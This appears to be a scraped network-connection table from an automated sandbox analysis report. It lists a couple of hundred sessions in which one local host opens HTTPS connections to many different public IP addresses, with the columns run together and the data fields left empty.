                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17269192.168.2.1360218103.93.155.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17270192.168.2.13548944.32.135.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17271192.168.2.1350082205.132.170.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17272192.168.2.1333688177.49.172.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17273192.168.2.135827042.120.52.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17274192.168.2.1343624181.0.234.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17275192.168.2.133775066.187.1.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17276192.168.2.1334488119.6.108.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17277192.168.2.1343152129.251.31.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17278192.168.2.135895666.246.157.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17279192.168.2.1360022160.250.18.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17280192.168.2.1360768129.164.51.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17281192.168.2.1355182117.225.188.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17282192.168.2.1358082163.214.109.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17283192.168.2.134318485.172.187.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17284192.168.2.133493850.204.98.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17285192.168.2.135543419.157.5.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17286192.168.2.135976635.223.243.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17287192.168.2.134102290.113.200.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17288192.168.2.135433057.33.51.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17289192.168.2.1356236113.134.236.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17290192.168.2.1343336149.210.119.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17291192.168.2.1356906134.28.55.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17292192.168.2.1358862155.111.123.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17293192.168.2.1354678105.124.211.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17294192.168.2.135451214.125.211.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17295192.168.2.1349380210.69.36.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17296192.168.2.135291246.113.151.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17297192.168.2.1354186131.138.175.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17298192.168.2.133704895.132.206.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17299192.168.2.1344274163.207.89.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17300192.168.2.133942873.45.124.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17301192.168.2.1347628199.174.207.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17302192.168.2.1350294159.226.175.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17303192.168.2.1345648198.160.223.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17304192.168.2.135606451.141.237.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17305192.168.2.135665449.58.40.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17306192.168.2.1343196138.165.183.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17307192.168.2.1334364202.169.110.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17308192.168.2.1354330203.194.254.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17309192.168.2.134061888.158.72.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17310192.168.2.1351848182.205.17.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17311192.168.2.1340156183.79.21.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17312192.168.2.1337348100.191.245.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17313192.168.2.135338017.55.137.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17314192.168.2.135765039.233.163.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17315192.168.2.1358548188.137.217.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17316192.168.2.135144861.150.241.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17317192.168.2.1342780218.131.49.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17318192.168.2.1341896116.84.154.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17319192.168.2.1340702139.40.215.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17320192.168.2.13489909.23.38.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17321192.168.2.135068412.4.193.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17322192.168.2.1339672204.26.17.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17323192.168.2.1336774179.111.159.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17324192.168.2.1342814161.155.108.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17325192.168.2.1359206177.170.80.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17326192.168.2.134321263.10.74.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17327192.168.2.135693671.116.81.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17328192.168.2.133991690.200.180.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17329192.168.2.1352564201.41.193.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17330192.168.2.134663212.7.170.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17331192.168.2.1339912102.20.91.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17332192.168.2.1343364208.134.229.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17333192.168.2.1341334134.33.249.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17334192.168.2.1335716174.64.214.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17335192.168.2.1346282160.19.185.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17336192.168.2.133833841.89.172.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17337192.168.2.1360140187.25.116.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17338192.168.2.1335016139.176.50.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17339192.168.2.1350216211.50.86.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17340192.168.2.1339740206.72.39.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17341192.168.2.134543042.46.32.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17342192.168.2.1337064107.75.184.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17343192.168.2.1347328163.4.218.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17344192.168.2.1349488110.160.144.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17345192.168.2.1356734140.4.82.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17346192.168.2.1358622165.204.64.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17347192.168.2.134032237.172.105.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17348192.168.2.135182687.121.96.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17349192.168.2.133564231.144.215.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17350192.168.2.1336314171.62.65.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17351192.168.2.1341052115.118.140.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17352192.168.2.1360328210.101.92.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17353192.168.2.1334034113.14.255.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17354192.168.2.135382813.74.201.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17355192.168.2.1345536145.227.199.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17356192.168.2.1335554152.151.70.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17357192.168.2.1333328109.121.26.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17358192.168.2.134931642.171.186.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17359192.168.2.1352082163.43.116.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17360192.168.2.1359264123.141.234.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17361192.168.2.1359934118.75.228.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17362192.168.2.135663093.59.38.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17363192.168.2.1335216165.119.114.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17364192.168.2.1343772114.26.132.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17365192.168.2.1334682138.232.146.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17366192.168.2.134902674.7.250.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17367192.168.2.1337226112.186.146.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17368192.168.2.133335236.23.251.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17369192.168.2.1337116101.20.93.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17370192.168.2.133728044.61.35.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17371192.168.2.134153458.235.79.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17372192.168.2.1358500144.63.187.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17373192.168.2.134570887.213.85.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17374192.168.2.135225484.84.236.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17375192.168.2.1333626193.194.84.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17376192.168.2.1353980167.175.149.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17377192.168.2.135303470.125.124.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17378192.168.2.1359178177.70.4.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17379192.168.2.1346060155.163.181.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17380192.168.2.135944661.71.199.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17381192.168.2.1338954113.65.121.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17382192.168.2.1333830211.152.63.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17383192.168.2.1345072176.212.153.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17384192.168.2.1341988200.173.114.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17385192.168.2.135955059.182.194.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17386192.168.2.134730471.97.135.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17387192.168.2.1348114110.88.243.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17388192.168.2.134121263.49.199.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17389192.168.2.1334988198.88.47.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17390192.168.2.134154218.232.203.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17391192.168.2.1352106183.86.104.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17392192.168.2.1339556198.108.140.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17393192.168.2.1338918119.132.133.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17394192.168.2.135271025.105.80.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17395192.168.2.1360844190.238.31.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17396192.168.2.1343668128.98.46.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17397192.168.2.134923868.122.113.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17398192.168.2.135289434.191.45.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17399192.168.2.1347382178.146.169.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17400192.168.2.1341092160.20.24.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17401192.168.2.1335242206.189.168.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17402192.168.2.1348406107.26.232.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17403192.168.2.1354334135.202.50.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17404192.168.2.1337572217.126.208.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17405192.168.2.1348836186.239.114.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17406192.168.2.1358604174.174.87.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17407192.168.2.13577245.13.134.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17408192.168.2.1337454140.43.136.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17409192.168.2.135456471.156.104.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17410192.168.2.134010432.53.107.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17411192.168.2.134649064.112.140.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17412192.168.2.135713271.85.19.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17413192.168.2.134833281.17.81.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17414192.168.2.135930692.110.91.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17415192.168.2.1359182115.144.113.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17416192.168.2.13525281.122.4.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17417192.168.2.133858847.184.71.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17418192.168.2.135836441.224.75.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17419192.168.2.135084432.54.214.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17420192.168.2.134162434.89.44.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17421192.168.2.135074886.122.21.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17422192.168.2.135746459.189.0.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17423192.168.2.133790474.215.88.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17424192.168.2.135895283.216.109.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17425192.168.2.1334712141.64.209.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17426192.168.2.134666854.65.195.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17427192.168.2.135120451.237.191.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17428192.168.2.1340474149.28.66.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17429192.168.2.1350404146.19.99.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17430192.168.2.1351344202.221.200.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17431192.168.2.133703891.170.250.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17432192.168.2.1357598211.92.223.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17433192.168.2.1339232165.56.95.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17434192.168.2.1335786185.119.52.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17435192.168.2.1347626163.98.134.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17436192.168.2.1349764109.231.28.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17437192.168.2.1335038173.14.49.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17438192.168.2.133356859.52.14.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17439192.168.2.1348092204.166.55.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17440192.168.2.1339842218.225.165.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17441192.168.2.1347234207.87.119.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17442192.168.2.133437676.108.93.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17443192.168.2.1348256205.111.20.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17444192.168.2.1333456107.55.1.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17445192.168.2.135436460.58.183.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17446192.168.2.134254491.82.170.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17447192.168.2.135976493.185.226.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17448192.168.2.133887080.25.158.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17449192.168.2.1350728159.86.242.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17450192.168.2.1351050131.252.192.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17451192.168.2.136072685.97.71.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17452192.168.2.134664657.116.249.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17453192.168.2.1335660144.161.151.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17454192.168.2.136052888.138.233.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17455192.168.2.1359834112.122.253.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17456192.168.2.134224838.171.223.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17457192.168.2.1346246183.89.89.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17458192.168.2.1335588111.104.99.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17459192.168.2.134626275.35.21.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17460192.168.2.135069243.172.120.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17461192.168.2.1350648223.242.51.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17462192.168.2.1348472145.76.21.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17463192.168.2.135894045.244.147.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17464192.168.2.135524225.213.79.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17465192.168.2.1344506143.126.63.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17466192.168.2.135172253.213.38.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17467192.168.2.1333332158.192.160.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17468192.168.2.1349490154.213.32.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17469192.168.2.134697825.31.214.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17470192.168.2.1353932197.23.235.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17471192.168.2.134546890.166.132.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17472192.168.2.134119267.23.176.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17473192.168.2.1340540221.128.41.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17474192.168.2.1350344200.46.38.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17475192.168.2.1339850139.178.121.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17476192.168.2.1348780166.58.61.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17477192.168.2.1343852164.216.152.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17478192.168.2.1344124109.66.159.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17479192.168.2.133445818.228.157.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17480192.168.2.1332890159.53.222.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17481192.168.2.1339066216.172.110.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17482192.168.2.1345434120.249.8.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17483192.168.2.1358206152.115.163.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17484192.168.2.1352024110.89.223.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17485192.168.2.1353360216.241.11.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17486192.168.2.1343030164.220.50.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17487192.168.2.1337254177.87.75.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17488192.168.2.1344514161.28.240.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17489192.168.2.1347844116.115.6.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
